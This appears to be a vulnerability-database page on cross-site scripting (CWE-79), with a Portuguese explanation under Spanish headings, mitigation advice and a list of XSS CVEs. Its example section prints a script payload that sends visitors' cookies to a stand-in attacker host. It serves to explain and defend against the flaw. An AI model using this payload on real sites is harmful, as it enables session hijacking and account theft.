Fallos del tipo CWE-79

28.947 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-30003MEDIUMSourcecodester Online Market Place Site 1.0 is vulnerable to Cross Site Scripting (XSS), allowing attackers to register as a Seller then creEPSS 0.6%CVE-2022-39054MEDIUMCOWELL INFORMATION SYSTEM CO., LTD. enterprise travel management system - Reflected XSSEPSS 0.6%CVE-2022-39035MEDIUMSmart eVision - Stored XSSEPSS 0.6%CVE-2022-4029MEDIUMSimple:Press <= 6.8 - Reflected Cross-Site Scripting via Cookie ValueEPSS 0.6%CVE-2026-12496HIGHLoytec LINX firmware: Unauthenticated stored XSS in OPC XML-DA serverEPSS 0.6%CVE-2024-34707HIGHNautobot's BANNER_* configuration can be used to inject arbitrary HTML content into Nautobot pagesEPSS 0.6%CVE-2026-45738HIGHArgo CD: Stored XSS in application link annotations enables developer-to-admin privilege escalationEPSS 0.6%CVE-2024-50346MEDIUMWebFeed HTML injection vulnerabilitiesEPSS 0.6%CVE-2018-16484—A XSS vulnerability was found in module m-server <1.4.2 that allows malicious Javascript code or HTML to be executed, due to the lack of escEPSS 0.6%CVE-2026-55730HIGHLoytec LWEB802: Reflected Cross-Site Scripting in LWEB802EPSS 0.6%CVE-2023-48986MEDIUMCross Site Scripting (XSS) vulnerability in CU Solutions Group (CUSG) Content Management System (CMS) before v.7.75 allows a remote attackerEPSS 0.6%CVE-2022-39053MEDIUMHEIMAVISTA INC. Rpage - Reflected XSSEPSS 0.6%CVE-2024-3695LOWSourceCodester Computer Laboratory Management System Users.php cross site scriptingEPSS 0.6%CVE-2017-20153LOWaerouk imageserve cross site scriptingEPSS 0.6%CVE-2023-3158HIGHMail Control <= 0.2.8 - Unauthenticated Stored Cross-Site Scripting via Email SubjectEPSS 0.6%CVE-2023-2388LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2023-28639MEDIUMGLPI vulnerable to reflected Cross-site Scripting in search pagesEPSS 0.6%CVE-2023-3783LOWWebile HTTP POST Request cross site scriptingEPSS 0.6%CVE-2023-6303LOWCSZCMS Site Settings Page cross site scriptingEPSS 0.6%CVE-2023-3785LOWPaulPrinting CMS cross site scriptingEPSS 0.6%